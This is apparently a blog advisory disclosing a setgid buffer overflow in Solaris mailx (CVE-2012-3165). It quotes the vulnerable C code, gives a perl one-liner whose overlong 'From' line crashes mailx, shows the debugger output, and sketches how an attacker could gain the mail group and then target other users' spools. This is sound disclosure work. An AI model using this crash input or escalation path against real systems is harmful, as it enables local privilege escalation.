martin carpenter

contents

most popular
2012/05/05, updated 2012/12/15
Ubuntu unity lens for vim
2010/04/14
ckwtmpx

solaris mailx(1) buffer overflow vulnerability

2012/10/18

tags: solaris mailx vulnerability CVE-2012-3165

summary

mailx(1) on Solaris 10 and 11 is world-executable, setgid and vulnerable to a buffer overflow bug. Via the mail group a local attacker potentially wins access to the local mail spool (/var/mail) and sendmail(8) configuration. They may then repeat the attack on any user susceptible to using mailx to read from the spool.

details

The problem occurs in the copyin() function of head.c (cribbed from an old copy of OpenSolaris source):

/*
 * Copy the string on the left into the string on the right
 * and bump the right (reference) string pointer by the length.
 * Thus, dynamically allocate space in the right string, copying
 * the left string into it.
 */

static char *
copyin(char src[], char **space)
{
    register char *cp, *top;
    register int s;

    s = strlen(src);
    cp = *space;
    top = cp;
    strcpy(cp, src);
    cp += s + 1;
    *space = cp;
    return(top);
}

The phrase "dynamically allocate" in the comment is incorrect. No new memory is allocated and therefore the target can be overrun. We can hit this by providing a very long "From" line in a message:

From AAAAAAAAAAAAA...

like this:

mallory@sunos:~$ perl -e 'print "From ".("a"x2048)."\n";' > /tmp/mbox
mallory@sunos:~$ mailx -f /tmp/mbox
Bus Error (core dumped)
mallory@sunos:~$

On SPARC this generates SIGBUS with stack:

ffbfcee8 setptr+0x49c(41414141, 43530, 0, 1, 0, 1)
ffbff778 setfile+0x510(40c00, 1, 1, 436e8, 44f8c, 43400)
ffbff8e0 main+0xa04(44800, 6d, 46910, 46910, 3f400, 1)
ffbff9c0 _start+0x108(0, 0, 0, 0, 0, 0)

here:

setptr+0x498:           f0 03 a0 64  ld        [%sp + 0x64], %i0
setptr+0x49c:           ec 06 20 00  ld        [%i0], %l6

At this point (setptr+0x49c), register %i0 contains:

%i0 = 0x41414141

whereas it should contain the progname string variable's address ("mailx"). That is, the stack has been clobbered by "AAA...".

spool

The local mail spool typically looks like this:

drwxrwxrwt   3 root     mail         512 Oct 17 02:03 /var/mail
-rw-rw----   1 root     mail         709 Sep 26 05:54 /var/mail/root

If the mail file does not already exist then the attacker can immediately create a malicious file (since the spool is world-writable). Otherwise they can first attack the mail group and then use those privileges to obliterate and replace any existing mail file in order to target individual users or roles, including root.

historical footnote

I checked back through the UNIX archives via Unix Tree to see just how old this bug was. I can trace it right back to BSD 2.79 (and it may be even older). 2.79 was released for the PDP-11 in 1979 making this the oldest bug I've ever found by quite a way.

timeline